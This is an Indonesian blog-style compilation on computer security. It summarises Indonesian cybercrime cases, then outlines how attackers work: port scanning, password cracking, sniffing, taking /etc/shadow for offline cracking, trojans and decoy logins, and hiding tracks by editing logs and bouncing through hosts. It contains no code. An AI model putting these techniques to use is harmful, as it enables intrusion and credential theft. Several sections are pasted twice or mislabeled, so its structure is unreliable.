KEAMANAN KOMPUTER
Menurut saya Keamanan Komputer Sangat Dibutuhkan karena:
1.Information Based Society menyebabkan informasi menjadi sangat
penting dan menuntut kemampuan untuk mengakses dan menyediakan
informasi secara tepat dan akurat menjadi sangat esensial bagi sebuah
organisasi.
2.Infrastruktur Jaringan komputer, seperti LAN dan Internet, memungkinkan
untuk menyediakan informasi secara cepat, sekaligus membuka potensi
adanya lubang keamanan (security hole)
3.Perkembangan Teknologi , seperti makin canggihnya computer dan
diketemukan ATM ( Anjungan Tunai Mandiri ). Dapat menjadi Sasaran
keamanan komputer terhadap pencurian atau korupsi
4. Sumber daya manusia ,makin berkembangnya pengetahuan sehingga mengubah cara berpikir dan
makin tingginya pendidikan manusia.
formats/html/ID-Security-HOWTO-2.html)
5. Kehidupan Sosial, kita ketahui bahwa zaman ekonomi semakin susah
sehingga orang berpikir untuk mendapatkan penghasilan secara cepat dan
mudah.
http://alimunsir.blogspot.com/2012/11/kejahatan-komputer.html
Kejahatan Komputer semakin meningkat karena :
1. Aplikasi berbasis TI dan jaringan computer meningkat.
a.E-Banking
Contoh Kejahatan E-banking :
Data Forgery Pada E-Banking BCA
Dunia perbankan melalui Internet (e-banking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama miriphttp://www.klikbca.com (situs asli Internet banking BCA), yaitu domainhttp://www.klik-bca.com,www.kilkbca.com,http://www.clikbca.com,http://www.klickca.com. Dan http://www.klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya.
b. Electronic Data Interchange (EDI)
Contoh Kejahatan Electronic Data Interchange (EDI)
Salah satu contoh kasus yang terjadi adalah pencurian dokumen terjadi saat utusan khusus Presiden Susilo Bambang Yudhoyono yang dipimpin Menko Perekonomian Hatta Rajasa berkunjung di Korea Selatan. Kunjungan tersebut antara lain, guna melakukan pembicaraan kerja sama jangka pendek dan jangka panjang di bidang pertahanan. Delegasi Indonesia beranggota 50 orang berkunjung ke Seoul untuk membicarakan kerja sama ekonomi, termasuk kemungkinan pembelian jet tempur latih supersonik T-50 Golden Eagle buatan Korsel dan sistem persenjataan lain seperti pesawat latih jet supersonik, tank tempur utama K2 Black Panther dan rudal portabel permukaan ke udara. Ini disebabkan karena Korea dalam persaingan sengit dengan Yak-130, jet latih Rusia. Sedangkan anggota DPR yang membidangi Pertahanan (Komisi I) menyatakan, berdasar informasi dari Kemhan, data yang diduga dicuri merupakan rencana kerja sama pembuatan 50 unit pesawat tempur di PT Dirgantara Indonesia (DI). Pihak PT DI membenarkan sedang ada kerja sama dengan Korsel dalam pembuatan pesawat tempur KFX (Korea Fighter Experiment). Pesawat KFX lebih canggih daripada F16. Modus dari kejahatan tersebut adalah mencuri data atau data theft, yaitu kegiatan memperoleh data komputer secara tidak sah, baik digunakan sendiri ataupun untuk diberikan kepada orang lain. Indentity Theft merupakan salah satu jenis kejahatan ini yang sering diikuti dengan kejahatan penipuan. Kejahatan ini juga sering diikuti dengan kejahatan data leakage. Perbuatan melakukan pencurian data, sampai saat ini tidak ada diatur secara khusus.
http://lizamainardianty.wordpress.com/2012/08/03/10-contoh-kasus-cyber-crime-yang-pernah-terjadi-beserta-modus-dan-analisa-penyelesaiannya/
c. e-Commerce
Contoh Kejahatan . e-Commerce
Satu lagi kasus yang berkaitan dengan cybercrime di Indonesia, kasus tersebut diputus di Pengadilan Negeri Sleman dengan Terdakwa Petrus Pangkur alias Bonny Diobok Obok. Dalam kasus tersebut, terdakwa didakwa melakukan Cybercrime. Dalam amar putusannya Majelis Hakim berkeyakinan bahwa Petrus Pangkur alias Bonny Diobok Obok telah membobol kartu kredit milik warga Amerika Serikat, hasil kejahatannya digunakan untuk membeli barang-barang seperti helm dan sarung tangan merk AGV. Total harga barang yang dibelinya mencapai Rp. 4.000.000,- (Pikiran Rakyat, 31 Agustus 2002).
http://megabrilianingrum.blogspot.com/2013/11/kejahatan-bisnis-dalam-e-commerce.html
2.Adanya Desentralisasi Server (Hacker)
Contoh kejahatan Desentralisasi Server :
Penyebaran virus dengan sengaja, ini adalah salah satu jenis kasus cyber crime yang terjadi pada bulan Juli 2009, Twitter (salah satu jejaring social yang sedang naik pamor di masyakarat belakangan ini) kembali menjadi media infeksi modifikasi New Koobface, worm yang mampu membajak akun Twitter dan menular melalui postingannya, dan menjangkiti semua follower. Semua kasus ini hanya sebagian dari sekian banyak kasus penyebaran malware di seantero jejaring social. Twitter tak kalah jadi target, pada Agustus 2009 diserang oleh penjahat cyber yang mengiklankan video erotis. Ketika pengguna mengkliknya, maka otomatis mendownload Trojan-Downloader.Win32.Banload.sco.
Modus serangannya adalah selain menginfeksi virus, akun yang bersangkutan bahkan si pemiliknya terkena imbas. Karena si pelaku mampu mencuri nama dan password pengguna, lalu menyebarkan pesan palsu yang mampu merugikan orang lain, seperti permintaan transfer uang . Untuk penyelesaian kasus ini, Tim keamanan dari Twitter sudah membuang infeksi tersebut. Tapi perihal hukuman yang diberikan kepada penyebar virusnya belum ada kepastian hukum.
http://deluthus.blogspot.com/2011/02/8-contoh-kasus-cyber-crime-yang-pernah.html
3.Adanya Single Vendor ke Multi Vendor
Contoh Kejahatan Single Vendor ke Multi Vendor :
Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan berhasil melakukan perubahan pada seluruh nama partai disitus TNP KPU pada jam 11:24:16 sampai dengan 11:34:27. Perubahan ini menyebabkan nama partai yang tampil pada situs yang diakses oleh publik, seusai Pemilu Legislatif lalu, berubah menjadi nama-nama lucu seperti Partai Jambu, Partai Kelereng, Partai Cucak Rowo, Partai Si Yoyo,Partai Mbah Jambon, Partai Kolor Ijo, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004. Dan sidang kasus pembobolan situs TNP Komisi Pemilihan Umum (KPU) digelar Senin(16/8/2004).
http://freezcha.wordpress.com/2011/02/27/contoh-kasus-cybercrime-bagian1/
http://kartini-16110022.blogspot.com/2013/04/kasus-kejahatan-komputer-di-indonesia.html
4.Adanya Peningkatan Kemampuan Pemakaian :
Contoh Kejahatan Peningkatan Kemampuan Pemakaian :
Kasus ini terjadi saat ini dan sedang dibicarakan banyak orang, kasus video porno Ariel “PeterPan” dengan Luna Maya dan Cut Tari, video tersebut di unggah di internet oleh seorang yang berinisial ‘RJ’ dan sekarang kasus ini sedang dalam proses.
Pada kasus tersebut, modus sasaran serangannya ditujukan kepada perorangan atau individu yang memiliki sifat atau kriteria tertentu sesuai tujuan penyerangan tersebut.
Penyelesaian kasus ini pun dengan jalur hukum, penunggah dan orang yang terkait dalam video tersebut pun turut diseret pasal-pasal sebagai berikut, Pasal 29 UURI No. 44 th 2008 tentang Pornografi Pasal 56, dengan hukuman minimal 6 bulan sampai 12 tahun. Atau dengan denda minimal Rp 250 juta hingga Rp 6 milyar. Dan atau Pasal 282 ayat 1 KUHP.
http://lizamainardianty.wordpress.com/2012/08/03/10-contoh-kasus-cyber-crime-yang-pernah-terjadi-beserta-modus-dan-analisa-penyelesaiannya/
5. Adanya yang berhubungan dengan internet
Contoh kejahatan yang berhubungan dengan internet :
Penjahat yang berhubungan dengan internet tersebut disebut dengan istilah "Cracker". Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer.
Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.
Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan
http://oliviacomic.wordpress.com/2013/09/23/kejahatan-dunia-maya-serta-contoh-dan-solusinya/
Memahami Cara kerja Hacker :
1 .MENCARI SISTEM KOMPUTER.
Sejak dulu, walaupun ketika itu tidak banyak komputer terhubung kedalam jaringan, para hacker mulai menampakkan diri. Ketika itu mereka mencari sistem dengan cara menghubungi nomor telepon yang dicurigai ada akses ke jaringan dengan modem. Biasanya yang menjadi sasaran adalah nomor telepon perusahaan besar yang kemungkinan besar memiliki akses jaringan. Kemudian mereka menghubungi nomor yang memberikan sinyal carrier. Jika sinyal karier ini ditemukan mereka merasa senang karena menemukan celah untuk menyusup ke komputer yang terhubung melalui modem dan line telepon. Walaupun melakukannya secara manual, lambat laun mereka sering melakukannya dengan program khusus yang disebut preffik scanner, Demon Dialer, atau War Dialer. Salah satu contoh dari program tersebut adalah ToneLoc.
Namun ketika internet mulai mengglobal, dengan sebagian besar komputer sudah terhubung ke jaringan, para hacker semakin mudah mencari sasaran komputer host. Saat ini yang perlu dicari bukanlah komputernya, melainkan pintu masuk yang bisa dimanfaatkan dalam sistem komputer tersebut. “Pintu”masuk disini adalah port, yaitu jalur-jalur keluar-masuknya data dari dan ke suatu komputer yang proses aksesnya disebut “port-surfing”. Pencarian port yang dapat digunakan biasa dilakukan dengan program khusus yang disebut Port Scanner. Contohnya Rebelion, PortPro dan PortScanner (mampu memeriksa sekelompok IP untuk memcari port yang terbuka). Diantara port yang sering terbuka adalah Port 23 (telnet), Port 43 (whois), port 79 (finger), dan port 25 (simple mail transfer protokol).
Servis-servis yang sering terdapat ini kemudian hari dapat digunakan untuk mengumpulkan informasi lebih jauh tentang host yang akan dijadikan sasaran. Servis yang paling umum adalah finger.
Finger, servis yang umum bagi sistem operasi UNIX (meskipun sudah ada versi windowsnya, misalnya finger32) adalah perintah yang dapat menampilkan informasi mengenai seorang pemakai jaringan. Cara kerjanya sebagai berikut. Bila seseorang menjalankan program utility finger client (misalnya finger32) tadi untuk mencari keterangan A di sistem B, misalnya, program finger client tadi akan mengirimkan ke finger daemon di sistem B. Daemon dalam konteks ini bukanlah makhluk meraqh yang berekor dan bertanduk (dan jidatnya ada angka 666), melainkan program yang ditempatkan sebagai penunggu prot-port pada host di internet. Daemon ini tugasnya menjalankan perintah dari luar secaraotomatis, misalnya mailer daemon, finger daemon, dan sebagainya. Finger daemon yang kemudian akan mengirimkan informasi yang diminta ketujuan. Kelengkapan informasi yang diberikan bisa berbeda-beda, tergantung konfigurasi sistem yang digunakan. Informasi yang umum ditampilkan antara lain lagin name, waktu login terakhir dan nama pemakai.
Contoh konfigurasi servis finger yang tidak umum telah dilakukan oleh beberapa staf ilmu komputer di Carnagie Mellon University beberapa tahun yang lalu. Ketika itu mereka menghubungkan komputer di DEC3100 yang menjalankan servis finger dengan sebuah otomat minuman dingin. Ini agar mereka bisa mengunakan perintah finger dari ruangan mereka masing-masing (ke coke@cs.cmu.edu) untuk mengetahui jumlah minuman yang amsih ada, dingin/tidaknya, dan jenisnya tanpa datang dan melihatnya sendiri.
Finger juga bisa digunakan untuk melihat daftar pemakaidalam suatu sistem, dalam hal ini, yang difinger adalah host-nya bukan nama pemakai secara spesifik, seperti finger host sasaran.com.
Perusahaan besar biasanya menonaktifkan fingerdaemon pada sistem mereka (dengan menyunting file /etc/inetd.conf) untuk menjaga keamanan jaringan mereka. Bila finger dilakukan pada sistem-sistem semacam itu, akan muncul pesan Connection Refused. Selain melakukan scanning terhadap port terbuka, juga bisa dilakukan scanning secara umum. Biasanya untuk mengetahui jenis sitem operasi dalam komputer, tipe daemon, file share (NETBIOS pada sistem berbasis Wndows).
2.MENYUSUP DAN MENYADAP PASSWORD.
Sesuai namanya, cara ini dilakukan dengan cara menebak kombinasi username dan password dalam sistem yang dijadikan sasaran. Dulu sekali, orang masih belum begitu sadar akan pentingnya password yang sulit ditebak, sehingga password mudah ditebak dengan cara manual. sekarang, cara menebak password ini dilakukan dengan menggunakan program.
Prinsip dasar program pemecah password dengan cara ini cukup sederhana. Basanya hacker yang ingin menggunakan program tersebut terlebih dulu menyusun daftar kata yang sering digunakan orang. Bisa berupa nama aktor, nama tempat, dan sebagainya. Lalu, program pemecah password tersebut akan mencobakombinasi yang sesuai. Ada juga program yang mencoba seluruh kombinasi kharakter yang mungkin , baik huruf, angka, maupun kharakter lain. Metode ini biasa disebut “brute forcing”. Beberapa program lebih baik misalnya Lophtkrack dan Unsecure, memiliki fasilitas untuk melakukan brute forcing maupun penebakan berdasarkan daftar kata.
Sampai sekarang, cara penebakan password masih banyak dipakai, dan program-programnya banyak, tersedia, baik untuk NT, UNIX maupun DOS. Misalnya saja krackerJack dan Starkrack. Program-program ini sebenarnya diciptakan untuk keperluan pengamanan sistem. Seorang administrator sistem biasanya memiliki beberapa program semacam ini, lengkap dengan seperangkat file daftar kata untuk memastikan bahwa password-password dalam sistemnya benar-benar kuat dan tidak mudah dibobol.
Pada awalnya, penggunaan metode penebakan password memiliki ekses yang cukup jelek, yakni sejumlah kegagalan login yang tinggi (akibat berbagai kombinasi yang salah) sebelum kombinasi yang sesuai ditemukan. Ini terutama terjadi pada penerapan brute forcing. Jumlah login yang gagal selalu dicatat dalam log system, dan log ini hampir pasti diperiksa administrator secara rutin. Sebagai akibatnya, administrator tahu bahwa upaya pembobolan tengah berlangsung. Oleh karena itu, para hacker sekarang berusaha menggunakan teknik-teknik tertentu untuk menyalin file daftar password dari sistem sasaran ke komputer mereka sendiri, lalu mencoba memecahkan dengan program penebak password saat offline. Dengan demikian, kemungkinan terdeteksi jauh lebih kecil.
Menyadap password dapat dilakukan dengan berbagai cara. Cara yang umum sekarang adalah dengan menyadap dan memeriksa paket-paket data yang lalu-lalang dalam suatu jaringan (lazim disebut sniffing atau packet monitoring ). Sniffing atau pengendus biasanya dilakukan etrhadap paket-paket data yang dikirim dalam bentuk teks biasa atau tidak dienskripsi.
Praktek sniffing yang lebih maju dibantu oleh sebuah protokol analizer, yang untuk membaca paket data yang dibungkus protokol etrtentu. Pemeriksaan paket-paket data dalam suatu jaringan sebenarnya adalah juga praktek yang bermanfaat bagi kalangan administrator sistem, untuk mengawasi gejala-gejala awal penyusupan. Namun cara ini juga umum dikalangan hacker maupun penjahat komputer.
Sebuah program pemantau paket dapat ditugaskan untuk mencari paket-paket yang berisikan kata-kata kunci semacam “password”, “login” dan sebagainya, lalu menyalin paket tersebut untuk dianalisis hacker yang bersangkutan. Contoh program sniffer antara lain Netmon, Etherpeek, LanWatch, tcpdump. Kesalahan pada program juga dapat dieksploitasi oleh para calon penyusup.
3.SNIFFING, CACHE POISONING & KEY LOGGER.
Jika anda termasuk salah seorang hacker sejati yang berada dalam sistem, kemungkinan besar anda akan berkeliling, melihat-lihat isi dari sistem yang baru saja dimasuki, dan mencoba berbagai perintah untuk mengetahui fungsinya. Salah satu contoh perintah yang sering digunakan adalah perintah ls (dalam UNIX). Perintah ini pada dasarnya hampir sama dengan perintah DIR dari DOS, yang berguna untuk melihat isi direktori.
Cara penggunaan script input (sniffing) yang bertujuanh mengeksploitasi kelemahan sistem juga sering digunakan. Metode sniffing dalam jaringan bisa dikombinasikan dengan cache poisoning. Cache poisoning dilakukan dengan cara “meracuni” tabel daftar alamat sebuah router atau perangkat sejenisnya, guna mengirimkan data ke jalur yang salah ( misalnya melalui komputer hacker). Ini utamanya yang terjadi pada sistem-sistem versi awal yang tidak melakukan otentikasi client/server.
Program lain yang mirip sniffer adalah key logger. Key logger sebenarnya lebih umum digunakan dalam pembobolan sistem komputer oleh orang dalam atau karyawan suatu perusahaan. Bila diaktifkan , program key logger akan bersifat residen di RMA komputer tempat tinggalnya. Program kemudian dapat mencatat setiap tombol yang ditekan oleh pemakai komputer tersebut, misalnya saat memasukan password.
4.MEMBONGKAR SANDI.
Sesuai namanya, cara ini dilakukan dengan cara menebak kombinasi username dan password dalam sistem yang dijadikan sasaran. Dulu sekali, orang masih belum begitu sadar akan pentingnya password yang sulit ditebak, sehingga password mudah ditebak dengan cara manual. sekarang, cara menebak password ini dilakukan dengan menggunakan program.
Prinsip dasar program pemecah password dengan cara ini cukup sederhana. Basanya hacker yang ingin menggunakan program tersebut terlebih dulu menyusun daftar kata yang sering digunakan orang. Bisa berupa nama aktor, nama tempat, dan sebagainya. Lalu, program pemecah password tersebut akan mencobakombinasi yang sesuai. Ada juga program yang mencoba seluruh kombinasi kharakter yang mungkin , baik huruf, angka, maupun kharakter lain. Metode ini biasa disebut “brute forcing”. Beberapa program lebih baik misalnya Lophtkrack dan Unsecure, memiliki fasilitas untuk melakukan brute forcing maupun penebakan berdasarkan daftar kata.
Sampai sekarang, cara penebakan password masih banyak dipakai, dan program-programnya banyak, tersedia, baik untuk NT, UNIX maupun DOS. Misalnya saja krackerJack dan Starkrack. Program-program ini sebenarnya diciptakan untuk keperluan pengamanan sistem. Seorang administrator sistem biasanya memiliki beberapa program semacam ini, lengkap dengan seperangkat file daftar kata untuk memastikan bahwa password-password dalam sistemnya benar-benar kuat dan tidak mudah dibobol.
Pada awalnya, penggunaan metode penebakan password memiliki ekses yang cukup jelek, yakni sejumlah kegagalan login yang tinggi (akibat berbagai kombinasi yang salah) sebelum kombinasi yang sesuai ditemukan. Ini terutama terjadi pada penerapan brute forcing. Jumlah login yang gagal selalu dicatat dalam log system, dan log ini hampir pasti diperiksa administrator secara rutin. Sebagai akibatnya, administrator tahu bahwa upaya pembobolan tengah berlangsung. Oleh karena itu, para hacker sekarang berusaha menggunakan teknik-teknik tertentu untuk menyalin file daftar password dari sistem sasaran ke komputer mereka sendiri, lalu mencoba memecahkan dengan program penebak password saat offline. Dengan demikian, kemungkinan terdeteksi jauh lebih kecil.
Menyadap password dapat dilakukan dengan berbagai cara. Cara yang umum sekarang adalah dengan menyadap dan memeriksa paket-paket data yang lalu-lalang dalam suatu jaringan (lazim disebut sniffing atau packet monitoring ). Sniffing atau pengendus biasanya dilakukan etrhadap paket-paket data yang dikirim dalam bentuk teks biasa atau tidak dienskripsi.
Praktek sniffing yang lebih maju dibantu oleh sebuah protokol analizer, yang untuk membaca paket data yang dibungkus protokol etrtentu. Pemeriksaan paket-paket data dalam suatu jaringan sebenarnya adalah juga praktek yang bermanfaat bagi kalangan administrator sistem, untuk mengawasi gejala-gejala awal penyusupan. Namun cara ini juga umum dikalangan hacker maupun penjahat komputer.
Sebuah program pemantau paket dapat ditugaskan untuk mencari paket-paket yang berisikan kata-kata kunci semacam “password”, “login” dan sebagainya, lalu menyalin paket tersebut untuk dianalisis hacker yang bersangkutan. Contoh program sniffer antara lain Netmon, Etherpeek, LanWatch, tcpdump. Kesalahan pada program juga dapat dieksploitasi oleh para calon penyusup.
3.SNIFFING, CACHE POISONING & KEY LOGGER.
Jika anda termasuk salah seorang hacker sejati yang berada dalam sistem, kemungkinan besar anda akan berkeliling, melihat-lihat isi dari sistem yang baru saja dimasuki, dan mencoba berbagai perintah untuk mengetahui fungsinya. Salah satu contoh perintah yang sering digunakan adalah perintah ls (dalam UNIX). Perintah ini pada dasarnya hampir sama dengan perintah DIR dari DOS, yang berguna untuk melihat isi direktori.
Cara penggunaan script input (sniffing) yang bertujuanh mengeksploitasi kelemahan sistem juga sering digunakan. Metode sniffing dalam jaringan bisa dikombinasikan dengan cache poisoning. Cache poisoning dilakukan dengan cara “meracuni” tabel daftar alamat sebuah router atau perangkat sejenisnya, guna mengirimkan data ke jalur yang salah ( misalnya melalui komputer hacker). Ini utamanya yang terjadi pada sistem-sistem versi awal yang tidak melakukan otentikasi client/server.
Program lain yang mirip sniffer adalah key logger. Key logger sebenarnya lebih umum digunakan dalam pembobolan sistem komputer oleh orang dalam atau karyawan suatu perusahaan. Bila diaktifkan , program key logger akan bersifat residen di RMA komputer tempat tinggalnya. Program kemudian dapat mencatat setiap tombol yang ditekan oleh pemakai komputer tersebut, misalnya saat memasukan password.
4.MEMBONGKAR SANDI.
Selain itu, seorang hacker dapat mencari password dengan mengotak-atik file yang kira-kira berhubungan. Misalnya saja pada sistem UNIX, file yang sering diperiksa adalah /etc/passwd, yang berisi daftar password.
Sejauh ini, belum ditemukan cara untuk menterjemahkan bagian password dalam file UNIX ke bentuk asli, karena disandikan secara satu arah yaitu dengan DES ( Data Encryption Standard) atau dengan triple DES. Pada saat seorang pemakai melakukan login , UNIX memeriksa benar tidaknya password yang dimasukan dengan cara menyandikan password tersebut, lalu membandingkan dengan password yang terenskripsi dalam file. Program pemecah password yang ada sekarang bekerja dengan menyandikan setiap kata dalam daftar kata, lalu membandingkannya dengan bagian password dalam file UNIX.
Untuk peningkatan keamanan, sebagian sistem UNIX menggunakan password shadowing. Password shadowing adalah mengganti kolom password dengan karakter khusus sementara password yang terenskripsi diletakan ditempat lain. Contoh penggunaannya irw:*14:4:Irwan:/home/irw:/bin/csh.
Dalam sistem yang menggunakan password shadowing, hacker akan mencari file password asli di direktori lain misalnya /etc/shadow. Direktori ini bisa berbeda-beda tergantung pada sistem operasi yang digunakan.
Sebenarnya bila file password berhasil didapat, seorang hacker tidak perlu terlalu repot berputar-putar mencari akses lagi. Ia dapat dengan mudah menyimpanya dikomputernya sendiri, lalu meng-kracknya dilain waktu. Dengan cara ini cepat atau lambat , hacker tersebut pasti akan mendapatkan seluruh password pemakai, termasuk password administrator sistem, si sistem tersebut.
5.TROJAN HORSE, DECOY & SHOULDER SURFING.
Cara lain untuk mencari hak akses yang lebih tinggi adalah dengan menggunakan trojan horse, atau biasa disebut trojan. Trojan sesuai legenda tentang kuda troya, adalah sesuatu program yagn ebrguna, tetapi telah disusupi kode atau perintah untuk menjalankan proses yang ilegal.
Sebuah kode untuk menghapus file-file tertentu tanpa sepengetahuan maupun seijin pemakai untuk login atau masuk ke suatu jaringan dapat ditambahi kode guna merekam nama pemakai dan password yang masuk, kemudian mengirimkannya ke komputer tertentu. Contoh koda troya elektornik adalah picture.exe, apabila dijalankan program akan mengirimkan data-data komputer kita ke suatu alamat email, misalnya ke Cina. Contoh yang lebih populer lagi adalah Netbus dan Back Orrifice-nya Cult of The Dead Cow.
Bentuk yang lebih kuno dari tojan adalah decoy. Decoy adalah program yang dibuat menyerupai tampilan login, tetapi sebenarnya berdiri sendiri. Decoy menipu pemakai untuk memasukan nama dan passwordnya ke dalam layar login tersebut. Setelah pemakai memasukan nama dan passwordnya, decoy akan menyimpan kombinasi tersebut ke dalam sebuah file, menampilkan pesan kesalahan yang memaksa pemakai merestart komputernya, atau pemakai mengulang login. Dan kala pemakai mengulang login, decoy akan mengembalikan ke sesi login yang sebenarnya.
Sebenarnya ada cara yang lebih sederhana, yang kadang-kadang disebut shoulder surfing. Secara praktisnya, shoulder surfing ini berarti diam-diam memperhatikan apa yang diketikan orang lain di komputernya. Tidak perlu teknik tinggi, apalagi kalau dicoba pada orang yang mahir mengetaik 10 jari. Aslinya cara in digunakan untuk mencuri kode telepon oleh para phreaker generasi awal di Amerika Serikat.
Sejauh ini, belum ditemukan cara untuk menterjemahkan bagian password dalam file UNIX ke bentuk asli, karena disandikan secara satu arah yaitu dengan DES ( Data Encryption Standard) atau dengan triple DES. Pada saat seorang pemakai melakukan login , UNIX memeriksa benar tidaknya password yang dimasukan dengan cara menyandikan password tersebut, lalu membandingkan dengan password yang terenskripsi dalam file. Program pemecah password yang ada sekarang bekerja dengan menyandikan setiap kata dalam daftar kata, lalu membandingkannya dengan bagian password dalam file UNIX.
Untuk peningkatan keamanan, sebagian sistem UNIX menggunakan password shadowing. Password shadowing adalah mengganti kolom password dengan karakter khusus sementara password yang terenskripsi diletakan ditempat lain. Contoh penggunaannya irw:*14:4:Irwan:/home/irw:/bin/csh.
Dalam sistem yang menggunakan password shadowing, hacker akan mencari file password asli di direktori lain misalnya /etc/shadow. Direktori ini bisa berbeda-beda tergantung pada sistem operasi yang digunakan.
Sebenarnya bila file password berhasil didapat, seorang hacker tidak perlu terlalu repot berputar-putar mencari akses lagi. Ia dapat dengan mudah menyimpanya dikomputernya sendiri, lalu meng-kracknya dilain waktu. Dengan cara ini cepat atau lambat , hacker tersebut pasti akan mendapatkan seluruh password pemakai, termasuk password administrator sistem, si sistem tersebut.
5.TROJAN HORSE, DECOY & SHOULDER SURFING.
Cara lain untuk mencari hak akses yang lebih tinggi adalah dengan menggunakan trojan horse, atau biasa disebut trojan. Trojan sesuai legenda tentang kuda troya, adalah sesuatu program yagn ebrguna, tetapi telah disusupi kode atau perintah untuk menjalankan proses yang ilegal.
Sebuah kode untuk menghapus file-file tertentu tanpa sepengetahuan maupun seijin pemakai untuk login atau masuk ke suatu jaringan dapat ditambahi kode guna merekam nama pemakai dan password yang masuk, kemudian mengirimkannya ke komputer tertentu. Contoh koda troya elektornik adalah picture.exe, apabila dijalankan program akan mengirimkan data-data komputer kita ke suatu alamat email, misalnya ke Cina. Contoh yang lebih populer lagi adalah Netbus dan Back Orrifice-nya Cult of The Dead Cow.
Bentuk yang lebih kuno dari tojan adalah decoy. Decoy adalah program yang dibuat menyerupai tampilan login, tetapi sebenarnya berdiri sendiri. Decoy menipu pemakai untuk memasukan nama dan passwordnya ke dalam layar login tersebut. Setelah pemakai memasukan nama dan passwordnya, decoy akan menyimpan kombinasi tersebut ke dalam sebuah file, menampilkan pesan kesalahan yang memaksa pemakai merestart komputernya, atau pemakai mengulang login. Dan kala pemakai mengulang login, decoy akan mengembalikan ke sesi login yang sebenarnya.
Sebenarnya ada cara yang lebih sederhana, yang kadang-kadang disebut shoulder surfing. Secara praktisnya, shoulder surfing ini berarti diam-diam memperhatikan apa yang diketikan orang lain di komputernya. Tidak perlu teknik tinggi, apalagi kalau dicoba pada orang yang mahir mengetaik 10 jari. Aslinya cara in digunakan untuk mencuri kode telepon oleh para phreaker generasi awal di Amerika Serikat.
6.MENGHILANGKAN JEJAK.
Dalam penjelajahannya, seorang hcker yang ahli kan selalu berusaha agar aksinya tidak diketahui orang. Ini untuk menghindari resiko dipenjarakan jika ia tertangkap tangan. Sebab saat ini hampir semua orang menganggap hacker sebagai teroris informasi, dan bahkan sebagai penjahat komputer.
Seorang hacker memperkecil kemungkinan terdeteksi oleh orang lain dengan melakukan aktifitasnya disaat sistem yang akan dimasukinya tidak atau kurang diawasi. Berkaitan dengan teknik, salah satu cara yang paling umum adalah menyunting file-file log pada system yang dimasuki dan menghilangkan semua entry yang berkaitan dengan dirinya. Aktivitas yang berlangsung selama hacking, misalnya aktivitas scanning, bisa disamarkan dengan memasang kuda troya / trojan ke program-program yang digunakan utuk mengawasi jaringan (misalnya netstat). Untuk menyembunyikan identitas saat melakukan finger, dapat digunakan semacam Finger@host1@host2. Ini adalah cara untuk memperoleh informasi finger tentang host2, tetapi perintahnya dialihkan sehingga seolah-olah datang dari host1.
Cara lain untuk menyamarkan identitas saat beraksi adalah melakukan bouncing. Bouncing adalah memanfaatkan sesuatu sistem sebagai basis operasi untuk memasuki sistem lain. Dalam praktek bouncing, jejak-jejak akan mengarah ke komputer yang dijadikan basis operasi dan bukan ke lokasi hacker sebenarnya. Bouncing dapat dilakukan melalui FTP, mesin proxy server, Wingate atau host lain (dengan memanfaatkan Telnet atau rsh). Selain melalui internet, bouncing juga bisa dilakukan melalui manipulasi hubungan dengan telepon. Bouncing semacam ini sukar sekali dilacak, tetapi tingkat kesulitannya juga tinggi.
Bagi seorang hacker, selain menyulitkan pelacakan , bouncing juga berguna untuk melewati berbagai program proteksi. Umpamanya komputer A yang berfungsi sebagai Web Server dan komputer yang fungsinya sebagai FTP server berada dalam suatu jaringan / subnet yang terhubung ke internet. Komputer A diproteksi terhadap akses dari internet oleh sebuah firewall. Hacker yang ingin masuk ke komputer A dapat memerintahkan komputer B yang terbuka untuk melakukan koneksi ke port tertentu dari komputer A. koneksi ini kemudian bisa dimanfaatkan oleh hacker. Karena komputer B dan A ada di subnet yang sama, lalu lintas data yang terjadi tidak akan disaring oleh program firewall yang hanya menyaring paket dari luar subnet.
7.MEMBUAT BACKDOOR.
Dalam penjelajahannya, seorang hcker yang ahli kan selalu berusaha agar aksinya tidak diketahui orang. Ini untuk menghindari resiko dipenjarakan jika ia tertangkap tangan. Sebab saat ini hampir semua orang menganggap hacker sebagai teroris informasi, dan bahkan sebagai penjahat komputer.
